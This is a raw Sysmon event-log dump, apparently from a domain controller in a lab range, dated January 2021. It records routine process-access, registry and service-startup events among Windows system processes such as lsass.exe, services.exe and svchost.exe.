10341000x8000000000000000777Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:58.424{59A5CD1D-8E46-6005-0C00-00000000A301}596600C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0700-00000000A301}712C:\Windows\system32\wininit.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+1abdc|c:\windows\system32\lsm.dll+22cc9|c:\windows\system32\lsm.dll+bcaf|c:\windows\system32\lsm.dll+3735d|c:\windows\system32\lsm.dll+158f9|c:\windows\system32\lsm.dll+36198|c:\windows\system32\lsm.dll+3530a|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000776Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.424{59A5CD1D-8E42-6005-0200-00000000A301}448460C:\Windows\System32\smss.exe{59A5CD1D-8E46-6005-0C00-00000000A301}596C:\Windows\system32\svchost.exe0x101441C:\Windows\SYSTEM32\ntdll.dll+a6624|\SystemRoot\System32\smss.exe+3fee|\SystemRoot\System32\smss.exe+3b53|C:\Windows\SYSTEM32\ntdll.dll+1d3f1|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\SYSTEM32\ntdll.dll+5179f 13241300x8000000000000000775Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:33:58.377{59A5CD1D-8E46-6005-0D00-00000000A301}628C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\MpsSvc\Parameters\PortKeywords\RPC-EPMap\CollectionBinary Data 13241300x8000000000000000774Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:33:58.377{59A5CD1D-8E46-6005-0D00-00000000A301}628C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\MpsSvc\Parameters\PortKeywords\RPC-EPMap\CollectionBinary Data 13241300x8000000000000000773Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 
13:33:58.377{59A5CD1D-8E46-6005-0D00-00000000A301}628C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\MpsSvc\Parameters\PortKeywords\RPC-EPMap\CollectionBinary Data 10341000x8000000000000000772Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.361{59A5CD1D-8E44-6005-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{59A5CD1D-8E44-6005-0700-00000000A301}712C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25dfa|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000771Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:58.361{59A5CD1D-8E44-6005-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{59A5CD1D-8E44-6005-0700-00000000A301}712C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000770Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.346{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-0D00-00000000A301}628C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+46868|c:\windows\system32\rpcss.dll+3a983|c:\windows\system32\rpcss.dll+3a8ee|C:\Windows\System32\RPCRT4.dll+50ff4|C:\Windows\System32\RPCRT4.dll+24e40|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000769Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:58.346{59A5CD1D-8E44-6005-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000768Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.330{59A5CD1D-8E44-6005-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{59A5CD1D-8E46-6005-0D00-00000000A301}628C:\Windows\system32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000767Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:58.330{59A5CD1D-8E44-6005-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{59A5CD1D-8E46-6005-0D00-00000000A301}628C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000766Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.330{59A5CD1D-8E44-6005-0A00-00000000A301}848948C:\Windows\system32\services.exe{59A5CD1D-8E46-6005-0D00-00000000A301}628C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\services.exe+1713f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000765Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:58.330{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-8E46-6005-0D00-00000000A301}628C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000764Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.330{59A5CD1D-8E44-6005-0A00-00000000A301}848852C:\Windows\system32\services.exe{59A5CD1D-8E46-6005-0D00-00000000A301}628C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+307d|C:\Windows\system32\services.exe+6334|C:\Windows\system32\services.exe+ddc1|C:\Windows\system32\services.exe+d3ee|C:\Windows\system32\services.exe+1a423|C:\Windows\system32\services.exe+20187|C:\Windows\system32\services.exe+21f27|C:\Windows\system32\services.exe+2486c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000763Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:58.299{59A5CD1D-8E44-6005-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000762Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.299{59A5CD1D-8E44-6005-0B00-00000000A301}856588C:\Windows\system32\lsass.exe{59A5CD1D-8E46-6005-0C00-00000000A301}596C:\Windows\system32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x8000000000000000761Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.299{59A5CD1D-8E44-6005-0B00-00000000A301}856588C:\Windows\system32\lsass.exe{59A5CD1D-8E46-6005-0C00-00000000A301}596C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000760Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.283{59A5CD1D-8E44-6005-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x8000000000000000759Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.174{59A5CD1D-8E44-6005-0A00-00000000A301}848948C:\Windows\system32\services.exe{59A5CD1D-8E46-6005-0C00-00000000A301}596C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\services.exe+1713f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000758Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.174{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-8E46-6005-0C00-00000000A301}596C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000757Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:58.174{59A5CD1D-8E44-6005-0A00-00000000A301}848852C:\Windows\system32\services.exe{59A5CD1D-8E46-6005-0C00-00000000A301}596C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+307d|C:\Windows\system32\services.exe+6334|C:\Windows\system32\services.exe+dc24|C:\Windows\system32\services.exe+d3ee|C:\Windows\system32\services.exe+1a698|C:\Windows\system32\services.exe+1a391|C:\Windows\system32\services.exe+20187|C:\Windows\system32\services.exe+21f27|C:\Windows\system32\services.exe+2486c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000756Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.173{59A5CD1D-8E46-6005-0C00-00000000A301}596C:\Windows\System32\svchost.exe10.0.14393.0 (rs1_release.160715-1616)Host Process for Windows ServicesMicrosoft® Windows® Operating SystemMicrosoft Corporationsvchost.exeC:\Windows\system32\svchost.exe -k DcomLaunchC:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=36F670D89040709013F6A460176767EC,SHA256=438B6CCD84F4DD32D9684ED7D58FD7D1E5A75FE3F3D12AB6C788E6BB0FFAD5E7,IMPHASH=2CED93915677390B76EE1916B92F3EF6{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\System32\services.exeC:\Windows\system32\services.exe 10341000x8000000000000000755Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:58.158{59A5CD1D-8E44-6005-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x8000000000000000754Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:33:57.611{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\NTDS\Parameters\DSA Database EpochDWORD (0x00000614) 10341000x8000000000000000753Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:57.002{59A5CD1D-8E44-6005-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000752Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:57.002{59A5CD1D-8E44-6005-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25dfa|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000751Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:57.002{59A5CD1D-8E44-6005-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000750Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:56.986{59A5CD1D-8E44-6005-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25dfa|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000749Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:56.986{59A5CD1D-8E44-6005-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000748Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 